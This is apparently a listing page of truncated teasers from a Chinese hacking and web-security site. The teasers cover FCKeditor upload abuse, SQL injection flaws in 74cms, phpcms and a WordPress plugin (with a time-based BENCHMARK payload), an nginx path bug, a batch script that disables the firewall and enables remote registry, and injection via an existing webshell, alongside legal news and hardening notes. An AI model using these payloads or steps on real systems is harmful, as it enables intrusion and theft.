Fckeditor本地TEST.HTML
自从以前暴了TEST.HTML的上传0day以后,好多站长们多把TEST.HTML给删了。可是上传的 文件没删。这样的话可以自己在构造一个。下面是俺收集的。 把以下代码保存成TEST.HTML就行了。然后修改里面的上传文件。 <!-- * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyrig...
关于办理危害计算机信息系统安全刑事案件9月1号起施行
最高人民法院、最高人民检察院29日联合发布了《关于办理危害计算机信息系统安全刑事案件 应用法律若干问题的解释》。这个共有十一条的司法解释自2011年9月1日起施行。 司法解释针对危害计算机信息系统安全犯罪所涉及的定罪量刑标准、单位犯罪、共同犯罪、 术语界定等问题,进一步明确了相关刑事案件的法律适用标准。重点内容包括:明确了非法获 取计算机信息系统数据、非法控制计算机信息系统罪,提供侵入、非法控...
74cms sql注入漏洞
74cms sql注入漏洞 function getip() { if(getenv('HTTP_CLIENT_IP')){ $onlineip=getenv('HTTP_CLIENT_IP'); }else if(getenv('HTTP_X_FORWARDED_FOR')){ $onlineip=getenv('HTTP_X_FORWARDED_FOR'); }else if(getenv('...
phpcms 2008 sp4 comment.php页面SQL注入漏洞分析
影响版本: phpcms 2008 sp4 官方地址:www.phpcms.cn 漏洞描述: 问题出在/comment/include/comment.class.php中关于function ajaxupdate($field, $id)的定义: 程序59行开始: function ajaxupdate( $field, $id ) { $sql = “UPDATE $this->_commen...
Discuz 1.5 配合NGINX二次解析爆路径BUG
作者:晴天小铸 测试环境:discuz X1.5+nginx 1.0 漏洞文件source/function/function_core.php,代码: $_G['setting']['domain']['app']['default'] && $content = preg_replace("/ 利用代码: https://www.webshell.cc/forum.php/adm...
最好的入侵检测linux教程
一:基本知识 1:常见UNIX版本: SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN),InTeractive,Mach,Minix,Mks Toolkit,NetNSD,OSF/I,System V Un...
Vsftpd安全
一、基本设置 1、login banner [root@station2 ~]# vi /etc/vsftpd/vsftpd.conf ftpd_banner=Welcome to blah FTP service. banner_file=/etc/vsftpd/banner [root@station2 ~]# vi /etc/vsftpd/banner Hello ,welcome to F...
WordPress插件SH Slideshow
标题: WordPress SH Slideshow plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 --------------- 缺陷代码分析 --------------- $result = $wpdb->query('delete from sh_slides where id = '.$_POS...
命令行下建立VPN
@echo off rem preparation sc config sharedaccess start= disabled net stop SharedAccess sc config remoteaccess start= auto net start RemoteAccess net start lanmanserver net start RemoteRegistry rem bui...
ASP构造注入点继续注入
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去 <!--#include file="xx.asp"--> <% set rs=server.createobject("ADODB.recordset") id = request("id") strS...